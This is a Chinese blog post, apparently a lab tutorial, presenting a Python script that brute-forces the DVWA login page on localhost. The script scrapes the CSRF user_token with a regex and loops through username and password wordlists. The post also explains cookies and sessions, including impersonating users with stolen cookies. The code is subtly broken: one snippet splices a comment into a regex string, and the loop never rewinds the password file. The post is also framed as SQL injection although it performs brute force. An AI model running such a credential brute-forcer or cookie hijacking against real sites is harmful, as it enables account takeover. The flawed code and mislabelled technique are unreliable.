Python — 获取数据库的用户名密码

Python — 获取数据库的用户名密码

1.sql注入脚本编程思路

构造一个合法的session,让服务器信任

1. 设法知道token值
2. 设法知道cookie值

2.具体步骤

  1. python脚本借助浏览器非法访问服务器,得到服务器的响应,登录失败,原因是没有token和cookie值

  2. 设法获取token值。通过正则表达式的方式

     req=requests.session()
     reqs = req.get(url=url).text
     a = re.findall("<input type='hidden' name='user_token' 
     '''a是一个数组'''
     value='(.*?)'", reqs)
    
     data = {
             'username': user,
             'password': password,
             'Login': 'Login',
             'user_token': a[0]
         }
    
  3. 获取token之后,再次访问服务器,发现request请求中缺少cookie参数。于是设法获取cookile值。

     req=requests.session()
    
     responst = req.post(url=url, data=data)
     if 'Login failed' not in responst.text:
         print(user)
         print(password)
    
  4. 最后在利用for循环的方式,读取字典中的值,进行暴力破解

     f1=open('user.txt','r')       #打开用户名字典
     f2=open('password.txt','r') 
     
     for line in f1:
         user=line.strip()         #逐行读取数据
         for line1 in f2:
             password=line1.strip()
    

3.cookie和session的联系与区别

3.1 cookie的工作原理

(1)浏览器端第一次发送请求到服务器端

(2)服务器端创建Cookie,该Cookie中包含用户的信息,然后将该Cookie发送到浏览器端

(3)浏览器端再次访问服务器端时会携带服务器端创建的Cookie

(4)服务器端通过Cookie中携带的数据区分不同的用户

3.2 session的工作原理

  1. 浏览器端第一次发送请求给服务器,服务器会创建一个session,同时会创建一个特殊的cookie(name为jsessionid的固定值,value为session对象的id),然后将该cookie发送给浏览器

  2. 后续浏览器访问服务器的时候,就会携带此cookie对象

  3. 服务器端根据浏览器携带的cookie区分不同的用户

    name为JSESSIONID(或value为SessionId) 的Cookie不存在(关闭或更换浏览器),重新去创建Session与特殊的Cookie

    name为JSESSIONID(或value为SessionId)的Cookie存在,根据value:SessionId去寻找session对象

3.3 共同之处

  1. 都是用来跟踪浏览器用户身份的会话方式

3.4 session 与 cookie 的区别

  1. cookie数据保存在客户端,session数据保存在服务端。session的过期取决于服务器,cookie的过期取决于最初设定的时长。

  2. session

    简单的说,当你登陆一个网站的时候,如果web服务器端使用的是session,那么所有的数据都保存在服务器上,客户端每次请求服务器的时候会发送当前会话sessionid,服务器根据当前sessionid判断相应的用户数据标志,以确定用户是否登陆或具有某种权限。由于数据是存储在服务器上面,所以你不能伪造。

  3. cookie

    如果浏览器使用的是cookie,那么所有数据都保存在浏览器端,比如你登陆以后,服务器设置了cookie用户名,那么当你再次请求服务器的时候,浏览器会将用户名一块发送给服务器,这些变量有一定的特殊标记。服务器会解释为cookie变量,所以只要不关闭浏览器,那么cookie变量一直是有效的,所以能够保证长时间不掉线。

    如果能截取某个用户的cookie变量,然后伪造一个数据包发送过去,就能欺骗服务器

    所以你在机器上面保存了某个论坛cookie,有效期是一年,如果有人入侵你的机器,将你的cookie拷走,放在他机器下面,那么他登陆该网站的时候就是用你的身份登陆的。当然,伪造的时候需要注意,直接copy cookie文件到 cookie目录,浏览器是不认的,他有一个index.dat文件,存储了 cookie文件的建立时间,以及是否有修改,所以你必须先要有该网站的 cookie文件,并且要从保证时间上骗过浏览器

3. 源码

import requests
import re

#ree=requests.cookies()
req=requests.session()
url='http://127.0.0.1/DVWA-master/login.php'      
f1=open('user.txt','r')        		#打开用户名字典
f2=open('password.txt','r') 

for line in f1:
    user=line.strip()					#逐行读取数据
    for line1 in f2:
        password=line1.strip()			#逐行读取数据
        reqs = req.get(url=url).text
        a = re.findall("<input type='hidden' name='user_token' value='(.*?)'", reqs)  
        #利用正则表达式获取token值;a是一个数组
        data = {
            'username': user,
            'password': password,
            'Login': 'Login',
            'user_token': a[0]
        }
        responst = req.post(url=url,data=data)
        if 'Login failed' not in responst.text:
            print(user)
            print(password)
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Buffedon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值